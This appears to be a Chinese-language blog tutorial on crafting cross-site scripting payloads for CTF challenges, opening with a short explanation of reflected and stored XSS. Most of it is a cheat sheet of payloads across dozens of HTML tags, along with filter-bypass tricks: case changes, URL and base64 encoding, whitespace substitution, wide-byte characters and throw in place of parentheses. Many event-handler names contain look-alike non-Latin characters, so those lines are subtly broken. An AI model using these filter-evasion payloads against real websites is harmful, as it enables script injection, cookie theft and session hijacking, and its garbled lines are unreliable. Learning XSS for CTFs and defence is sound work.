xss构造

一、概念：
      xss跨站脚本：一种经常出现在WEB应用程序中的计算机安全漏洞，是由于WEB应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意代码的脚本注入到网页中去，当其他用户浏览这些网站的时候，就会执行其中的恶意代码，窃取用户的cookies，会话劫持，钓鱼欺骗。

二、分类：
    1、反射型也称非持久性脚本，主要将恶意脚本附加到URL地址的参数值中，通常出现在网站的搜索栏、用户登录入口等，用来窃取客户端cookies或进行钓鱼欺骗。
    2、持久性跨站脚本，不需要用户单击特定URL就能执行跨站脚本，攻击者实现将恶意JavaScript代码上传或存储到漏洞服务器中，只要受害者浏览包含恶意JavaScript代码的页面就会执行恶意代码，一般出现在网站的留言、评论、博客日志等交互处，恶意脚本被存储到客户端或者服务器数据库中 。

三、CTF中的XSS
      CTF中的XSS题目设计一般为：要求参赛者在网址或者网页的搜索框中插入非持久性脚本，绕过关键词过滤，脚本运行弹出窗口，网页后台代码会检测网页是否有窗口弹出，有弹出，网页会执行后台代码，跳转网页给出flag或者直接弹出带有flag的窗口。

四、xss绕过关键词过滤
      解答CTF中的XSS题目，目的就是能让自己插入的代码运行弹出窗口，获取flag。

1、利用弹窗标签,这是最主要的一种方法，其他方法都是围绕其服务

a标签

#javascript协议
<a href=javascript:alert(1)>点我啊</a>

# data协议
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0Pg==>点我</a>

# url编码的data协议
<a    href=data:text/html;%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>

# 另两种方式实现
<a xlink:href="javascript:alert(14)"><rect width="1000" height="1000" fill="black"/></a></svg>
<math><a xlink:href=javascript:alert(1)>点我</math>

script标签

# 直接弹窗
<script>alert(1)</script>
<script>confirm(1)</script>
<script>pormpt(1)</script>

# javascript协议编码
<script>alert(String.fromCharCode(49))</script>

# 如果输出是在setTimeout里，我们依然可以直接执行alert(1)
<script>setTimeout('alert(1)',0)</script>

button标签

# 点击弹窗
<button/οnclick=alert(1) >点我</button>

# 不需要点击就能弹窗
<button οnfοcus=alert(1) autofocus>

p标签

# 可以直接使用事件触发
<p/οnmοuseοver=alert(1)>点我</p>

img标签

# 可以使用事件触发
<img src=x οnerrοr=alert(1)>

body标签

# 事件触发
<body οnlοad=alert(1)>

# onscroll 事件在元素滚动条在滚动时触发，即页面存在很多内容，需要滚动才能看到下面的内容，就会触发
<body οnscrοll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

var标签

# 事件触发，一般是用不需交互的事件比如鼠标移动等
<var οnmοusemοve=alert(1)>M</var>

div标签

# 事件触发
<div/οnclick='alert(1)'>X</div>

input标签

和button一样通过autofocus可以达到无需交互即可弹窗的效果。
<input οnfοcus=javascript:alert(1) autofocus>
<input οnblur=javascript:alert(1) autofocus><input autofocus>

select标签

<select οnfοcus=javascript:alert(1) autofocus>

textarea标签

<textarea οnfοcus=javascript:alert(1) autofocus>

keygen标签

<keygen οnfοcus=javascript:alert(1) autofocus>

frameset标签

<FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>

svg标签

<svg οnlοad="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
<svg xmlns="http://www.w3.org/2000/svg"><g οnlοad="javascript:alert(1)"></g></svg>

math标签

<math href="javascript:javascript:alert(1)">CLICKME</math>
<math><y/xlink:href=javascript:alert(51)>test1

video标签

<video><source οnerrοr="alert(1)">
<video src=x οnerrοr=alert(48)>

audio标签

<audio src=x οnerrοr=alert(47)>

embed标签

<embed src=javascript:alert(1)>

meta标签

    测试时发现，文章标题跑到meta标签中，那么只需要跳出当前属性再添加http-equiv=”refresh”，就可以构造一个有效地xss payload。还有一些猥琐的思路，就是通过给http-equiv设置set-cookie，进一步重新设置cookie来干一些猥琐的事情。
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/><meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">

marquee标签

<marquee onstart="alert('1')"></marquee>

isindex标签

<isindex type=image src=1 οnerrοr=alert(1)>
<isindex action=javascript:alert(1) type=image>

    当过滤掉javascript，alert等常见关键词，单引号，双引号，分号时，可以尝试使用以上不同的标签插入，达到弹出窗口的目的。

2. 大小写绕过：<sCript>

3. alert被过滤，可以尝试prompt和confirm

4. 空格被过滤：<img/src=""οnerrοr=alert(2)> <svg/οnlοad=alert(2)></svg>

5. <imgsrc="1"οnerrοr="alert(1)">和<imgsrc="1"οnerrοr="alert(1)">是等效的，没有过滤&，#等符号，我们就可以写入任意字符

6. 长度限制时： <q/oncut=alert(1)>//在限制长度的地方很有效

7. 括号被过滤,可以使用throw来抛出数据
<a οnmοuseοver="javascript:window.οnerrοr=alert;throw 1">2</a>
<img src=x οnerrοr="javascript:window.οnerrοr=alert;throw 1">

9. 过滤某些关键字（如：javascript） 可以在属性中的引号内容中使用空字符、空格、TAB换行、注释、特殊的函数，将代码行隔开。如：javas%09cript:alert()、javas%0acript:alert()、javas%0dcript:alert()，其中%0a表示换行。

10、宽字节绕过：gbxxxx系列的编码，那么我们尝试一下宽字节  %c0，%bf，%5c，%df

11、编码绕过：十六进制编码、jsfuck编码、url编码、unicode编码

<0x736372697074>alert('123')</0x736372697074>
<img src="1" οnerrοr="alert(1)">